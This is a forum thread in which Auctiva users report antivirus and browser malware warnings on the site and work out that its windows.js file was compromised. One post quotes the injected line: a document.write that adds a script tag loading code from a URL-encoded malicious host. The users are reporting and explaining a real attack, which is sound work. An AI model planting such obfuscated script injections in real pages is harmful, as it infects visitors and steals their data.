attention! urgent! virus on auctiva.com; Trojan-Clicker.HTML.IFrame.kr

Yea my AntiVir is saying Malware detected.

Whats up Auctiva


**couple hours later (11:16 AM)**
now it says Virus, and nothing about Malware. I have no idea whats going on.

I'm not an expert, but those URLs do not look like Auctiva ones...they end in .js? All of Auctiva's URLs end in .aspx. If there was really a virus on the auctiva site (which I would think is highly unlikely), I'm sure there would be 1,000s of people on here complaining about it.

Thats what I thought looking at his links but my AntiVir does say Malware ALERT and advises not to continue in Internet Explorer.

On Google Chrome its the same thing ONLY the Google Chrome browser finds it and warns me.

I get warnings when I

when I logged in
save a listing
put a picture on a listing
change the folder to a different picture folder
click the picture in a listing preview
Click edit to edit picture
to crop a picture
the save after the crop
choose a category

and bunch of other times, I just choose not to bore you anymore

A message from Google Chrome when i try to make a listing.

"Warning: Visiting this site may harm your computer!
The website at www.auctiva.com contains elements from the site me9x.cn, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
For detailed information about the problems with these elements, visit the Google Safe Browsing diagnostic page for me9x.cn.
Learn more about how to protect yourself from harmful software online."

It's a bunch of chinese sites links on the site. you can even see a tiny square just on top of the auctiva in some pages. Looks to me security has been compromised and someone embedding scripts into the site. It's rather irritating with my browser crashing a few times because of it.

I was just going to post something about the Pulsing "A" in the upper left! But you beat me to it.

Hmmmm...

I'm getting an odd notice to load an ActiveX Control from the main page ( snapview.ocx ). That one does have malware possibilities. It's not on every visit (I'm declining until I understand the situation), so it may not be on all the servers.

The .js lib is their javascripts.

Has anyone reported the problem?

Danno

Hi all, just read your messages and also experincing same problem. attempt to gain access into listings when the page crash followed by a warning that my anti virus has detected a virus....ca anyone advise please?

quote:

Originally posted by Danno:
Has anyone reported the problem?

I haven't, not sure how though!

Experiencing many of the same problems. One problem I have encountered, which I haven't seen anyone one else describe, is when opening the listings page. Windows installer tries to install something related to "Microsoft Office 2000 SR-1 Professional."

avg is also showing alert on this:
http://safeweb.norton.com/repo...ow?name=luckffxi.com

It's not appearing on all the pages, only on e.g. saved listings page

Now everywhere I go in the site I am getting warning from AntiVir.

I have 2 pulsing "A"s by the auctiva logo now!

I have to log off and scan my computer now! I'll check back later

Wanted to sign up for Auctiva for our new Ebay store when, lo and behold, Chrome pops up a security warning. I dug into this and found some very interesting stuff.

It looks like Auctiva has a security hole someone is actively driving their truck through it. The problem is in http://www.auctiva.com/js/windows.js
If you point your browser there (it's safe, it will read as text) and scroll down the bottom you should see a document.write statement. If you don't see it wait a few minutes and refresh. It looks like someone is trying to fix the file but something else is putting the attack back in which is why it might not be there when you look.

See how the URL looks like gibberish? It's ASCII code for me9x.cn, a Chinese site blacklisted by Google. The code in question writes a GIF file into the page. This is why you're getting it blocked in browsers like Firefox or Chrome, which pull the Google blacklist and enforce it. If your antivirus picked it up, good for you. The GIF file is likely reading your cookies (or worse if you're using IE). Whatever the case, that file is up to no good and if you can see this image Gortusk describes you may already have problems on your computer that you can't see.

I would highly suggest the following
1. Do not log into auctiva.com for now. The forums are clean (they appear to be on a different server) but the main site is clearly compromised.
2. Switch to Firefox or Google Chrome as your browser. Both browsers blocked the attack.
3. Run some anti-malware software, especially if your antivirus didn't catch this attack (not all antivirus has anti-malware). A good place to start is Adaware (http://www.lavasoftusa.com). There are many others out there as well (AVG seems to be catching this already).

Here's hoping for a quick fix. Was hoping to add some tools to my store today.

ooh..
document.write('<script src=http://%6D%65%39%78%2E%63%6E/new.gif></script>');

chinese bad boy ruining our day(or night)..

I agree with Highland. One of my two computers appears to have been compromised.

Danno

I NEVER get viruses, yet as of this a.m I've spent my entire day trying to figure out why I had one when I booted up this a.m. (Auctiva was the last site visited yesterday). I have a big red warning from Norton (this pop-up window won't go away!) it says:

HIGH RISK

trojan.malscript!html

So now I can't work - now what? Is every Auctiva user infected? HOW did this happen?

Hi all,

I have AVG 7.5 internet security and every time I try and do something in auctiva it throws me out. Can't even email auctiva to notify them!!

Anyone had a response from them regarding how long it's going to be before we can use auctiva gain?